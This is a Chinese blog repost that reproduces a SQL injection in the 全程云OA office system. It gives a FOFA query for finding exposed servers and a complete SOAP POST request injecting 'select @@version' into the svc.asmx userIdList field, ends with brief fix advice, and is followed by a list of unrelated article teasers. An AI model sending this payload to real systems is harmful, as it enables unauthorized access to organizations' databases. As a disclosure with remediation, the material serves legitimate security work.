全程云OA SQL注入漏洞复现

全程云OA SQL注入漏洞复现

article2025/2/2 15:33:09/文章来源:https://blog.csdn.net/qq_41904294/article/details/134631794

0x01 产品简介

全程云OA为企业提供日常办公管理、公文管理、工作请示、汇报、档案、知识体系、预算控制等26个功能，超过100多个子模块。为企业内部提供高效、畅通的信息渠道，同时也能大力推动公司信息系统发展，提高企业的办公自动化程度和综合管理水平，加快企业信息的流通，提高企业市场竞争能力。

0x02 漏洞概述

由于全程云oa办公系统/OA/PM/svc.asmx页面参数过滤不当，导致存在sql注入漏洞，未授权的攻击者可利用该漏洞获取数据库中的敏感信息。

0x03 复现环境

FOFA：body="images/yipeoplehover.png"

0x04 漏洞复现

PoC

POST /OA/PM/svc.asmx HTTP/1.1
Host: your-ip
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10_14_3) AppleWebKit/605.1.15 (KHTML, like Gecko) Version/12.0.3 Safari/605.1.15
Content-Type: text/xml
Accept-Encoding: gzip
Connection: close

<?xml version="1.0" encoding="utf-8"?>
<soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/">
  <soap:Body>
    <GetUsersInfo xmlns="http://tempuri.org/">
      <userIdList>select @@version</userIdList>
    </GetUsersInfo>
  </soap:Body>
</soap:Envelope>

查询数据库版本

0x05 修复建议

使用预编译语句。

对进入数据库的特殊字符进行转义处理。

本文来自互联网用户投稿，该文观点仅代表作者本人，不代表本站立场。本站仅提供信息存储空间服务，不拥有所有权，不承担相关法律责任。如若转载，请注明出处：/a/192520.html

如若内容造成侵权/违法违规/事实不符，请联系我们进行投诉反馈qq邮箱809451989@qq.com，一经查实，立即删除！

相关文章

SAS Planet软件介绍与使用教程

SAS Planet软件介绍与使用教程

软件情况 SAS Planet是一位俄罗斯爱好者创建的的开源应用，该应用可以浏览与下载主流网络地图，包括Google地图、Google地球、Bing地图、Esri 地图、Yandex地图等。该软件是基于Pascal开发的应用，目前已在github上开源，并使用了GP…

阅读更多...

哈希表、哈希冲突解决办法

哈希表、哈希冲突解决办法

文章目录一、什么是哈希表？二、什么是哈希冲突？怎样解决？三、哈希表的大小为什么是质数？四、链表法五、开放地址法线性探测法平方探测法双哈希(Double Hashing) 六、哈希表满了怎么办？七、完美哈希八、一些使用哈希解…

阅读更多...

Java抽象类和接口（2）

Java抽象类和接口（2）

🐵本篇文章继续对接口相关知识进行讲解一、排序 1.1 给一个对象数组排序： class Student {public String name;public int age;public Student(String name, int age) {this.name name;this.age age;}public String toString() {return "name:…

阅读更多...

爆肝整理！ Python 网络爬虫 + 数据分析 + 机器学习教程来了

爆肝整理！ Python 网络爬虫 + 数据分析 + 机器学习教程来了

前段时间，有小伙伴多次在后台留言询问 Python 爬虫教程的问题。经过这两个多月以来的收集与整理，汇集了多个高校以及公开课视频教程，包括 python 爬虫的入门、进阶与实践，共 9G 左右。爬虫作为机器学习语料库构建的主要方式&#…

阅读更多...

Python中的sys模块详解

Python中的sys模块详解

1. 简介 sys模块是Python标准库中的一个内置模块，提供了与Python解释器和运行环境相关的功能。它包含了一些与系统操作和交互相关的函数和变量，可以用于获取命令行参数、控制程序的执行、管理模块和包、处理异常等。 2. 常用函数和变量 2.1 命令行参数…

阅读更多...

虹科Pico汽车示波器 | 汽车免拆检修 | 2016款东风悦达起亚K5车发动机怠速抖动严重、加速无力

虹科Pico汽车示波器 | 汽车免拆检修 | 2016款东风悦达起亚K5车发动机怠速抖动严重、加速无力

一、故障现象一辆2016款东风悦达起亚K5车，搭载G4FJ发动机，累计行驶里程约为8.2万km。该车发动机怠速抖动严重、加速无力，同时发动机故障灯异常点亮，为此在其他维修厂更换了所有点火线圈和火花塞，故障依旧，…

阅读更多...

自驾游汽车托运是交智商税吗?

自驾游汽车托运是交智商税吗?

自驾游汽车托运是交智商税吗? 亲爱的小伙伴们你们有没有遇到过这样的困扰： 自驾游时，车辆的运输问题让你头疼不已? 是选择自己驾驶还是托运呢? 今天，我就来给大家种草一下汽车托运的好处， 让你的自驾游之旅更加轻松愉快! 1️.…

阅读更多...

idea spring initializr创建项目报错

idea spring initializr创建项目报错

闲来无事就想搞个项目练练手，没想到直接给我卡在项目创建上了，一个个问题最终迎刃而解。 1.上来就给我报了个maven的错未解析的插件: ‘org.apache.maven.plugins:maven-resources-plugin:3.3.1’ 不慌，应该是maven的路径有问题&#xff0c…

阅读更多...

本地Nginx服务搭建结合内网穿透实现多个Windows Web站点公网访问

本地Nginx服务搭建结合内网穿透实现多个Windows Web站点公网访问

文章目录 1. 下载windows版Nginx2. 配置Nginx3. 测试局域网访问4. cpolar内网穿透5. 测试公网访问6. 配置固定二级子域名7. 测试访问公网固定二级子域名 1. 下载windows版Nginx 进入官方网站(http://nginx.org/en/download.html)下载windows版的nginx 下载好后解压进入nginx目…

阅读更多...

Flask WTForms 表单插件的使用

Flask WTForms 表单插件的使用

在Web应用中，表单处理是一个基本而常见的任务。Python的WTForms库通过提供表单的结构、验证和渲染等功能，简化了表单的处理流程。与此同时，Flask的扩展Flask-WTF更进一步地整合了WTForms，为开发者提供了更便捷、灵活的表单处理方式…

阅读更多...

Linux（9）：正规表示法与文件格式化处理

Linux（9）：正规表示法与文件格式化处理

简单的说，正规表示法就是处理字符串的方法，他是以行为单位来进行字符串的处理行为，正规表示法透过一些特殊符号的辅助，可以让使用者轻易的达到【搜寻/删除/取代】某特定字符串的处理程序。正规表示法基本上是一种【表示法】&…

阅读更多...

【运营思维】美团面试题：如何把梳子卖给寺庙和尚？

【运营思维】美团面试题：如何把梳子卖给寺庙和尚？

Hello 小米的小伙伴们~ 欢迎来到小米的微信公众号！今天小米要和大家分享一道美团运营面试题，题目可真是独特——“如何把梳子卖给寺庙和尚？”想必大家一定兴奋不已吧！ 首先，让我们理清思路，挑战这个看似不…

阅读更多...

[学习笔记]IK分词器的学习

[学习笔记]IK分词器的学习

IK分词器有几种模式 # 测试分词器 POST /_analyze {"text":"黑马程序员学习java太棒了","analyzer": "standard" }# 测试分词器 POST /_analyze {"text":"黑马程序员学习java太棒了","analyzer": &quo…

阅读更多...

最新AI创作系统ChatGPT系统运营源码+DALL-E3文生图+支持OpenAI-GPT全模型+国内AI全模型

最新AI创作系统ChatGPT系统运营源码+DALL-E3文生图+支持OpenAI-GPT全模型+国内AI全模型

一、AI创作系统 SparkAi创作系统是基于ChatGPT进行开发的Ai智能问答系统和Midjourney绘画系统，支持OpenAI-GPT全模型国内AI全模型。本期针对源码系统整体测试下来非常完美，可以说SparkAi是目前国内一款的ChatGPT对接OpenAI软件系统。那么如何搭建部署AI…

阅读更多...

1评论收藏分享抖店不要再无脑铺货了！这个方法学会，7天流量就起飞~

1评论收藏分享抖店不要再无脑铺货了！这个方法学会，7天流量就起飞~

这2023年都马上过完了，你还在上一堆链接到抖店吗？要知道这样无脑铺货是拿不到大流量的。哪今天我给大家分享一个，比较适合新手操作，也能快速起流量出单的方法。。首先你的店铺拿不到流量，一定要先查清楚你为什么拿…

阅读更多...

海外Leads Generation产业：中国出海群体的行业大机会

海外Leads Generation产业：中国出海群体的行业大机会

Leads Generation（简称LeadsGen）指的是集中精力吸引和开发潜在客户的营销策略。通过引导式的营销策略，企业分发内容吸引潜在客户，引导客户留下电话/邮件/姓名等信息。基于这些信息，企业可建立潜在客户数据库&#xff0…

阅读更多...

P8A002-CIA安全模型-配置Linux描述网络安全CIA模型之可用性案例

P8A002-CIA安全模型-配置Linux描述网络安全CIA模型之可用性案例

【预备知识】可用性（Availability）数据可用性是一种以使用者为中心的设计概念，易用性设计的重点在于让产品的设计能够符合使用者的习惯与需求。以互联网网站的设计为例，希望让使用者在浏览的过程中不会产生压力或感到挫折，并能让使用者在使用网站功能时，能用最少的努力…

阅读更多...

数据结构与算法编程题27

数据结构与算法编程题27

计算二叉树深度 #define _CRT_SECURE_NO_WARNINGS#include <iostream> using namespace std;typedef char ElemType; #define ERROR 0 #define OK 1 #define Maxsize 100 #define STR_SIZE 1024typedef struct BiTNode {ElemType data;BiTNode* lchild, * rchild; }BiTNo…

阅读更多...

基于单片机的智能鱼缸（论文+源码）

基于单片机的智能鱼缸（论文+源码）

1.总体设计在本次设计中，其系统整个框图如下图2.1所示。其主要的核心控制模块由单片机模块，LCD显示模块，喂食模块，蜂鸣器模块，按键模块，复位电路，抽水电路，加热电路，加…

阅读更多...

麒麟V10服务器搭建FTP服务

麒麟V10服务器搭建FTP服务

概念 1.1介绍 FTP：File transfer protocol 文件传输协议 1.2原理默认采用被动模式被动模式FTP 为了解决服务器发起到客户的连接的问题，人们开发了一种不同的FTP连接方式。这就是所谓的被动方式，或者叫做PASV，当客户端通…

阅读更多...

最新文章